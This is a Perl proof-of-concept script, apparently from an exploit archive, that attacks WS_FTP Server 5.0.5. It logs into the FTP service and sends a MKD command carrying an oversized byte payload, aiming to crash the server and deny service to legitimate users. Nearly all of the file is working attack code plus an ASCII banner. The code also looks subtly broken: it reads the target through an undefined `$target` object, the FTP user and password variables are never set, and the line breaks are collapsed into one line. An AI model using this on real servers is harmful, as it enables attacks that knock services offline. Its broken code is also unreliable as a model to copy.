#!/usr/bin/perl use IO::Socket::INET; # Exploit Title: WS_FTP Server 5.0.5 - Denied of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 30 january 2024 # Vendor Homepage: N/A # Notification vendor: No reported # Tested Version: 5.0.5 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denied of Service (DoS) #1. Description about vunerability and exploited #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit we intentionally increased the number of bytes sent to the server to process. #We concluded that the FTP server does not correctly manage the amount of data or bytes sent and processed, causing denied service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); my $exploit = "\x41"x676; $exploit .= "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"; $exploit .= "\x42"x3000; $exploit .= "\r\n"; my $sock = IO::Socket::INET->new( PeerAddr => $target->$ip, PeerPort => $target->$port, Proto => 'tcp', ) or die "Not connect to $ip:$port: $!"; my $response = <$sock>; print "Connected => $response"; $sock->send("USER $ftp_user\r\n"); $response = <$sock>; print "Authentication USER: $response"; $sock->send("PASS $ftp_pass\r\n"); $response = <$sock>; print "Authentication PASSWORD: $response"; $sock->send("MKD ".$exploit); $response = <$sock>; print "Exploited : $response"; sub intro { print q { ---------- # ------------------------------------------------------------------ --------- ##= ------- [+] WS_FTP Server 5.0.5 - Denied of Service (DoS) ------- -------- ##=== ---------------------------------------------------------------- ------ ###==#=== -------------------------------------------------------------- ---- ####===##==== ------------------------------------------------------------ -- #####====###===== ----- Coded by Fernando Mengali ----- - #####=====####===== ----- [email protected] ----- - #####=====####===== --------------------------------------------------------- --- ####= # #==== -------- Prepare to exploiting the server ------------ --------- ##= ----------------------------------------------------------------- ------- ####=== --------------------------------------------------------------- } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } }